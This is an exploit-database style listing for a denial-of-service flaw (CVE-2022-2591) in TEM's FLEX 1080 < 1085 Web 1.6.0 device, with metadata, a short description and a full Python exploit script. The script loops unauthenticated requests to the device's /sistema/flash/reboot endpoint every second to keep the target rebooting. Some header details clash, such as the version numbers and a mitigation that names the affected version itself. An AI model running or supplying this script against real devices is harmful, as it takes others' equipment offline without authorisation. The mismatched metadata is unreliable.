header-logo
Suggest Exploit
vendor:
FLEX 1080 Web
by:
Mr Empy
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: FLEX 1080 Web
Affected Version From: 1.6.2000
Affected Version To: 1.6.2000
Patch Exists: YES
Related CWE: CVE-2022-2591
CPE: a:tem:flex_1080_web:1.6.0
Metasploit:
Other Scripts:
Platforms Tested: Android
2023

FLEX 1080 < 1085 Web 1.6.0 - Denial of Service

A denial of service vulnerability exists in FLEX 1080 < 1085 Web 1.6.0, which could allow an attacker to cause a denial of service condition. An attacker can send a specially crafted request to the vulnerable server to trigger this vulnerability.

Mitigation:

Upgrade to the latest version of FLEX 1080 < 1085 Web 1.6.0
Source

Exploit-DB raw data:

# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591
#!/usr/bin/env python3
import requests
import re
import argparse
from colorama import Fore
import time

def main():
    def banner():
        print('''
            ________    _______  __
           / ____/ /   / ____/ |/ /
          / /_  / /   / __/  |   /
         / __/ / /___/ /___ /   |
        /_/   /_____/_____//_/|_|

[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]

''')
    def reboot():
        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
        if 'Rebooting' in r.text:
            pass
        else:
            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
não é vulnerável')
            quit()

    banner()
    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
    while True:
        try:
            reboot()
            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
derrubado com sucesso!')
            time.sleep(1)
        except:
#            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
está inativo')
            pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-t','--target', action='store', help='Target',
dest='target', required=True)
    arguments = parser.parse_args()
    try:
        main()
    except KeyError:
        quit()

Navigation

Suggest Exploit

Services By CQR